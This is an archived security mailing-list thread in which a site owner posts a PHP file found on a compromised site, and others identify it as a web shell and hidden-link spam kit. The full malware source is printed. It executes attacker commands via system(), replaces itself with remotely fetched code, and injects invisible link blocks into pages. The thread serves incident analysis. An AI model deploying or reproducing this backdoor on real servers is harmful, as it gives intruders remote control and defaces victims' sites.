Odd PHP file, trying to find out what it does
From: dimitrios at gmail.com (Dimitrios Kapsalis)
Date: Mon, 1 Mar 2010 11:14:54 -0600
Google this tag: <adsttnmq1>, which is seen in the code above. It is the literal marker string the script's MRepl() and UpKos() functions prepend to the zero-size hidden <font> block they splice into the target page (and that Clear2() strips out again), so it is a usable search handle for finding other pages modified by the same kit. This looks to be an older attack that came up around 3/24/09. On Mon, Mar 1, 2010 at 10:29 AM, Andrew Ellis <only.samurai at gmail.com> wrote:
This is pretty heavily obscured (obviously), but the structure and some of the things it's doing is reminiscent of PHP Shell, like C99. Code like: function Com() { if (isset($_POST['c'])) @system($_POST['c']); if (isset($_GET['c'])) @system($_GET['c']); } Is used to pass things through the web-page to the server, allowing the malicious user to control things more granularly. I copied all the code you posted to a server and ran it through php at the command line. If you add in something like $_POST['c'] = "ls > test.txt" to the top of the file and run it, you'll find no output on the page, but a nicely created test.txt file with the contents of the directory containing this script... Sad to say, looks like you were 0wned. On Mon, Mar 1, 2010 at 3:16 AM, Adrian Crenshaw <irongeek at irongeek.com> wrote:Ok, I think one of my sites may have been compromised. I found thefollowingPHP script on a site, but I'm not sure what it is trying to do. Anyoneelseever seen this script before? Adrian <?php ignore_user_abort(1); set_time_limit(0); function Clear() { unlink("c"); unlink("1r"); unlink("log"); } function Clear2() { $mrd = trim(file_get_contents("m")); $pt = "../$mrd"; $fin = file_get_contents($pt); $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin); $fin = ereg_replace("<!--dd4-->", "", $fin); $fin = ereg_replace("<!--dd5-->", "", $fin); $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin); $fmrd = fopen($pt, "w+"); fwrite($fmrd, $fin); fclose($fmrd); echo " upt-ok"; } function GetVar($name, &$var) { $var = ""; if (isset($_POST[$name])) $var = $_POST[$name]; if (isset($_GET[$name])) $var = $_GET[$name]; if (($var) =="") return false; else return true; } function Gen() { $alp = "abcdefghiklmnjsweqrtyuiopzx"; $maps = array(); if 
(isset($_POST["sg"])) $sg = $_POST["sg"]; if (isset($_GET["sg"])) $sg = $_GET["sg"]; if (isset($_POST["gm"])) $g = $_POST["gm"]; if (isset($_GET["gm"])) $g = $_GET["gm"]; $path = ""; $fr = fopen("1r", "a+"); if (file_exists("c")) { $fconf = file("c"); $tname = trim($fconf[0]); $cname = trim($fconf[1]); $curs = trim($fconf[2]); $pid = trim($fconf[3]); if ($pid == 100) { $pid = 0; $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<3; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $cname = $nm; mkdir("$tname/$cname"); $curs = $g; } } else { $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<5; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $tname = $nm; $pid = 0; $curs = $g; mkdir($tname); $fht = fopen("$tname/.htaccess", "w+"); $htname = $sg."2.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($fht, $fin); fclose($fht); $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<3; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $cname = $nm; mkdir("$tname/$cname"); } $gname = $sg."sgen.php"; for ($j=$pid; $j<$pid+10; $j++) { $fp = fopen($gname."?g=$curs", "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+"); fwrite($fnd, $fin); fclose($fnd); } if ($j==100) { $fp = fopen($gname."?g=$curs&m=1", "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+"); fwrite($fnd, $fin); fclose($fnd); $map = "$path/$tname/$cname/$curs"."_lm.htm"; fwrite($fr,"$map\n"); } $fconf = fopen("c", "w+"); fwrite($fconf, $tname."\n"); fwrite($fconf, $cname."\n"); fwrite($fconf, $curs."\n"); $nj = $j; fwrite($fconf, $nj."\n"); fclose($fconf); } function Update() { $thisname = "1.php"; if (isset($_POST['u'])) $u = $_POST['u']; if (isset($_GET['u'])) $u = 
$_GET['u']; $fp = fopen($u, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fthis = fopen($thisname, "w+"); fwrite($fthis, $fin); fclose($fthis); } function Com() { if (isset($_POST['c'])) @system($_POST['c']); if (isset($_GET['c'])) @system($_GET['c']); } function UpKos() { $mrd = trim(file_get_contents("m")); $pt = "../$mrd"; $fin = file_get_contents($pt); $fin = ereg_replace("adsttnmq1", "<adsttnmq1>", $fin); $fin = ereg_replace("sdioyslkjs2", "<sdioyslkjs2>", $fin); $fmrd = fopen($pt, "w+"); fwrite($fmrd, $fin); fclose($fmrd); } function MRepl() { $mpt = ""; $drs = ""; $begtag = "<adsttnmq1><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; $endtag = "</font></body></html><sdioyslkjs2> "; $mrd = trim(file_get_contents("m")); $pt = "../$mrd"; $fin = file_get_contents($pt); GetVar("mpt", $mpt); // ??????? ??????????? ???? ???? $fin = preg_replace ("/<\/body>/i", "", $fin); $fin = preg_replace ("/<\/html>/i", "", $fin); $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); $fp = fopen($mpt, "r"); GetVar("drs", $drs); $fin = $fin.$begtag; $drs = str_replace("\\", "", $drs); $fin = $fin.$drs; $fin = $fin.$endtag; $fmrd = fopen($pt, "w+"); fwrite($fmrd, $fin); fclose($fmrd); } function Main() { if (isset($_POST['u']) || isset($_GET['u'])) { Update(); exit(); } if (isset($_POST['c']) || isset($_GET['c'])) { Com(); exit(); } if (isset($_POST['uk']) || isset($_GET['uk'])) { UpKos(); exit(); } if (isset($_POST['g']) || isset($_GET['g'])) { Gen(); exit(); } if (isset($_POST['s']) || isset($_GET['s'])) { MRepl(); exit(); } if (isset($_POST['cl']) || isset($_GET['cl'])) { Clear(); exit(); } if (isset($_POST['cl2']) || isset($_GET['cl2'])) { Clear2(); exit(); } echo "<ok>"; } Main(); ?> _______________________________________________ Pauldotcom mailing list Pauldotcom at mail.pauldotcom.com 